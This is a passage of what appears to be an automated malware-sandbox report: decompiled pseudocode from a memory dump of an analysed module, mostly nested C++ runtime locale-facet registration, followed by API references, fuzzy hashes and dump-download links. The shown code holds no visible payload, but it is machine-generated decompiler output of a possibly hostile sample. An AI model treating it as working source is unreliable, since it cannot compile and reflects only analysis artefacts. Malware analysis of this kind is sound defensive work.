						_push(_t858 - 0x10);
						__eflags = E6DDE0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t858 - 0x20);
							E6DDF3D74(_t858 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t799, _t819, 0x14);
							E6DDD6653(_t858 - 0x14, 0);
							_t820 =  *0x6de96de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6DDB161C(0x6de96d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6DDD66BA(_t858 - 0x14);
								return E6DDF0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6DDE0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t858 - 0x20);
										E6DDF3D74(_t858 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t606, _t800, _t820, 0x14);
										E6DDD6653(_t858 - 0x14, 0);
										_t821 =  *0x6de96db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6DDB161C(0x6de96d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6DDD66BA(_t858 - 0x14);
											return E6DDF0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6DDE0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t858 - 0x20);
													E6DDF3D74(_t858 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t606, _t801, _t821, 0x14);
													E6DDD6653(_t858 - 0x14, 0);
													_t822 =  *0x6de96dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6DDB161C(0x6de96d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6DDD66BA(_t858 - 0x14);
														return E6DDF0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6DDE0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t858 - 0x20);
																E6DDF3D74(_t858 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t606, _t802, _t822, 0x14);
																E6DDD6653(_t858 - 0x14, 0);
																_t823 =  *0x6de96dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6DDB161C(0x6de96d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6DDD66BA(_t858 - 0x14);
																	return E6DDF0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6DDE0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t858 - 0x20);
																			E6DDF3D74(_t858 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t606, _t803, _t823, 0x14);
																			E6DDD6653(_t858 - 0x14, 0);
																			_t824 =  *0x6de96df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6DDB161C(0x6de96d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6DDD66BA(_t858 - 0x14);
																				return E6DDF0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6DDE1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t858 - 0x20);
																						E6DDF3D74(_t858 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t606, _t804, _t824, 0x14);
																						E6DDD6653(_t858 - 0x14, 0);
																						_t825 =  *0x6de96dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6DDB161C(0x6de96d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6DDD66BA(_t858 - 0x14);
																							return E6DDF0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6DDE10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t858 - 0x20);
																									E6DDF3D74(_t858 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t606, _t805, _t825, 0x14);
																									E6DDD6653(_t858 - 0x14, 0);
																									_t826 =  *0x6de96df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6DDB161C(0x6de96da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6DDD66BA(_t858 - 0x14);
																										return E6DDF0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6DDE1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t858 - 0x20);
																												E6DDF3D74(_t858 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t606, _t806, _t826, 0x14);
																												E6DDD6653(_t858 - 0x14, 0);
																												_t827 =  *0x6de96df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6DDB161C(0x6de96da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6DDD66BA(_t858 - 0x14);
																													return E6DDF0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6DDE11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t858 - 0x20);
																															E6DDF3D74(_t858 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t606, _t807, _t827, 0x14);
																															E6DDD6653(_t858 - 0x14, 0);
																															_t828 =  *0x6de96dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6DDB161C(0x6de96d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6DDD66BA(_t858 - 0x14);
																																return E6DDF0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6DDE1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t858 - 0x20);
																																		E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t606, _t808, _t828, 0x14);
																																		E6DDD6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6de96dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6DDB161C(0x6de96d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6DDD66BA(_t858 - 0x14);
																																			return E6DDF0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6DDE12B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t858 - 0x20);
																																					E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t606, _t809, _t829, 0x14);
																																					E6DDD6653(_t858 - 0x14, 0);
																																					_t830 =  *0x6de96dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6DDB161C(0x6de96d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6DDD66BA(_t858 - 0x14);
																																						return E6DDF0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6DDE1339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t858 - 0x20);
																																								E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t606, _t810, _t830, 0x14);
																																								E6DDD6653(_t858 - 0x14, 0);
																																								_t831 =  *0x6de96db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6DDB161C(0x6de96d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6DDD66BA(_t858 - 0x14);
																																									return E6DDF0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6DDE13A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t858 - 0x20);
																																											E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t606, _t811, _t831, 0x14);
																																											E6DDD6653(_t858 - 0x14, 0);
																																											_t832 =  *0x6de96ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6DDB161C(0x6de96d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6DDD66BA(_t858 - 0x14);
																																												return E6DDF0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6DDE1409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t858 - 0x20);
																																														E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t606, _t812, _t832, 0x14);
																																														E6DDD6653(_t858 - 0x14, 0);
																																														_t833 =  *0x6de96de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6DDB161C(0x6de96d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6DDD66BA(_t858 - 0x14);
																																															return E6DDF0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6DDE1471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t858 - 0x20);
																																																	E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t606, _t813, _t833, 0x14);
																																																	E6DDD6653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6de96dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6DDB161C(0x6de96da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t858 - 0x14);
																																																		return E6DDF0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6DDE14EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t858 - 0x20);
																																																				E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t606, _t814, _t834, 0x14);
																																																				E6DDD6653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6de96dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6DDB161C(0x6de96d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t858 - 0x14);
																																																					return E6DDF0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6DDE1558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t858 - 0x20);
																																																							E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t606, _t815, _t835, 0x14);
																																																							E6DDD6653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6de96e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6DDB161C(0x6de96dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t858 - 0x14);
																																																								return E6DDF0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6DDE15C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t858 - 0x20);
																																																										E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t606, _t816, _t836, 0x14);
																																																										E6DDD6653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6de96dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6DDB161C(0x6de96d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t858 - 0x14);
																																																											return E6DDF0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6DDE162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6DDB1438(_t739);
																																																													E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de3851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6de3c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6DDE542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6DDF0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t817);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6de96dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t816);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6de96e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t815);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6de96dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t814);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6de96dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t813);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6de96de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t812);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6de96ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t811);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6de96db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t810);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6de96dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t809);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6de96dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t808);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6de96dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6DDD6FD3(__eflags, _t807);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6de96df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6DDD6FD3(__eflags, _t806);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6de96df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6DDD6FD3(__eflags, _t805);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6de96dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6DDD6FD3(__eflags, _t804);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6de96df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6DDD6FD3(__eflags, _t803);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6de96dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6DDD6FD3(__eflags, _t802);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6de96dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6DDD6FD3(__eflags, _t801);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6de96db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6DDD6FD3(__eflags, _t800);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6de96de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6DDD6FD3(__eflags, _t799);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6de96dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF0EE
int.LIBCPMT ref: 6DDDF105

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDF128
std::_Facet_Register.LIBCPMT ref: 6DDDF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF17D

Strings

(km, xrefs: 6DDDF0F9

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (km
API String ID: 1394824916-2527675895
Opcode ID: b24a6dc2632e705bfac81400aa66da48277cd40520cfba0e11915d313ca87dda
Instruction ID: 191dba7abbb72576ecd601b09361200ed1ddea008b270fe081a75084b09f103d
Opcode Fuzzy Hash: b24a6dc2632e705bfac81400aa66da48277cd40520cfba0e11915d313ca87dda
Instruction Fuzzy Hash: F211A075908129DBCF01FBA4C850ABEB7B4AF45718F260009F615AB390DF7499058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
